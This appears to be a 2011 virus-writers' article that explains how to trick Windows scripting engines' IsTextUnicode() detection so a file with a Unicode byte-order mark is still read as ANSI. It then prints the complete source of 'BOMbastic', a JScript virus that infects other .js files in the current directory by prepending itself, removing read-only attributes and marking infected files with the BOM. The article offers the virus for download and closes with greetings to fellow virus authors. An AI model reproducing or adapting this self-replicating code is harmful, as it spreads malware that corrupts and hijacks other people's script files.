roy g biv
February 2011
[Back to index] [Comments (0)]
- What is a BOM?
- Why should we care?
- Great, can we do that?
- Okay, let's do it!
- Unicode in files
- Greets to friendly people (A-Z)
What is a BOM?
It's not the thing that explodes. That's a BOMB. Heh. BOM is Byte Order Marker. Some Unicode files use the Byte Order Marker to say that they are Unicode, and to say the order of the bytes (little-endian or big-endian). I say "some Unicode files" because there are exceptions, and one of those exceptions is very interesting: VBScript and JScript. Yes, Microsoft scripting technologies do not care about BOM is present or not (delete BOM and see for yourself!). They detect Unicode format using a special API called IsTextUnicode().
Why should we care?
The special thing about the IsTextUnicode() API is that it can only guess if a file is Unicode format or ANSI format. It cannot say for sure, so if we can put a BOM in the front of the file but force the API to return ANSI format, then we can put lots of Unicode in the file to fool people and some tools.
Great, can we do that?
Of course :) but only for JScript. :(
The IsTextUnicode() API takes three parameters: lpBuffer, cb, lpi. lpBuffer is a pointer to the buffer to examine, cb is the size of the buffer, and lpi is a pointer to a variable that contains flags to test on input, and it also receives the result on output. The API examines up to 256 bytes of the file, and then performs the tests that are requested. Microsoft scripting engines call the API with lots of flags to test, but only one is interesting for us: IS_TEXT_UNICODE_ILLEGAL_CHARS. The engines also ignore the return value and check only if IS_TEXT_UNICODE_ILLEGAL_CHARS is set.
If we put an illegal Unicode character in the first 256 bytes of the file, then the engines will think that the file is in ANSI format, even if there is a BOM in the front of the file. Meanwhile, everyone else will still think that the file is in Unicode format.
The characters that are considered to be illegal are 0x0a0d, 0xfeff, 0xffff (only in little-endian format)... and 0x0000. Who remembers my "Pretext" virus from 2002? I used there a technique that I call "tar-script". Microsoft's scripting engines calculate the length of a script by using strlen() function. This means that when a 0 is found, no more file is examined, so if our script ends with a 0 then we can append anything to it and no errors will happen. In this case, we use double-zero to make illegal Unicode character, and still work for ANSI case.
In ANSI mode, BOM can be used for variable name in JScript files. Of course, 256 bytes is not enough for the virus, so the host must be made into "sandwich" where virus code is at start and end, and host code is in the middle.
Okay, let's do it!
Except that it doesn't work. Since the JScript engine is not intended to support something like this, I should not call it a bug. When I tried to write the host code to disk in order to run it, a section of the file was all zeroes. The number of zeroes there depended on the size of the host code. If the code was larger then more zeroes, if smaller then fewer zeroes. The host could not be run when like that. Also, if the host code was large enough, the sandwich code did not run either. So I had to think of another way. It was very simple solution after all. I just had to make the file size odd so that it could not possibly be Unicode format. The simplest way to do that is to make the virus code even and append a single character after the host. The virus code size must be even so that the host code is visible.
Unicode in files
It is interesting that I could not find a way to force the scripting engines to write Unicode strings. They always seem to call WideCharToMultiByte() before writing, because all strings are Unicode format internally. If I read from a file, the engines always seem to call MultiByteToWideChar(), no matter what is the format of the data. If the data were Unicode already, then they become "double-Unicode". It's very weird, so I had to convert to Unicode on my own.
Let's see the code.
<BOM>="BOMbastic - roy g biv 01/02/11"
a=new ActiveXObject("scripting.filesystemobject")
try
{
c=a.opentextfile(b=WScript.scriptfullname) //open host
d=c.read(750) //read virus code. 750 is size of virus with no comments or spaces
//if you change the size of code, then you must change this value
e=a.getfile(b) //get our file object
f=c.readall() //read rest of host file
c=e.attributes //save attributes
e.attributes=0 //remove any read-only attribute
g=a.createtextfile(b) //make new host
for(h=0;h<f.length-1;h+=2)
g.write(f.substr(h,1)) //convert Unicode to ANSI and write host
g.close() //close host to allow run later
e.attributes=c //restore attributes
}
catch(z)
{
}
for(c=new Enumerator(a.getfolder(".").files);!c.atEnd();c.moveNext())
//demo version, current directory only
{
e=c.item()
if(b!=e&&a.getextensionname(e).toLowerCase()=="js")
try
{
f=a.opentextfile(e) //open potential victim
g=f.read(1) //read first character, keep for later
if(g!="/xff") //check for BOM (used as infection marker)
try
{
h=g+f.readall() //read entire file
i=e.attributes //save attributes
e.attributes=0 //remove any read-only attribute
j=a.createtextfile(e) //open file for writing
j.write(d) //prepend to file
for(k=0;k<h.length;++k)
j.write(h.substr(k,1)+"/0") //convert ANSI to Unicode and write host
j.write("r")
j.close() //close file (write mode)
e.attributes=i //restore attributes
}
catch(z)
{
}
f.close() //close file (read mode)
}
catch(z)
{
}
}
new ActiveXObject("wscript.shell").exec("wscript "+b)
//run host
<0 here>
Doenload the BOMBAST.js
Greets to friendly people (A-Z)
Active - Benny - herm1t - hh86 - izee - jqwerty - Malum - Obleak - Prototype - Ratter - Ronin - RT Fishel - sars - SPTH - The Gingerbread Man - Ultras - uNdErX - Vallez - Vecna - Whitehead
摘自:http://vx.netlux.org/lib/vrg07.html
18:28:12
2011-03-05